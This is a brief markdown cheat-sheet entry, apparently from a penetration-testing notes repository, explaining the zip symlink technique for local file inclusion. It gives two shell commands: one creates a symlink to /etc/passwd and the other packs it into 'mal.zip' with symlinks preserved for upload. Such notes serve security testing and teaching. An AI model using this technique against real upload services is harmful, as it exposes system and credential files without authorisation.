17 lines
334 B
Markdown
17 lines
334 B
Markdown
# Zip Symlink
|
|
|
|
https://effortlesssecurity.in/zip-symlink-vulnerability/
|
|
|
|
The exploit is a method of using LFI through an uploaded symlink compressed inside a zip file.
|
|
Create a symlink and put it in a zip file.
|
|
|
|
```sh
|
|
ln -s /etc/passwd link.name
|
|
```
|
|
|
|
compress it leaving symlinks intact
|
|
|
|
```sh
|
|
zip -r --symlinks mal.zip link.name
|
|
```
|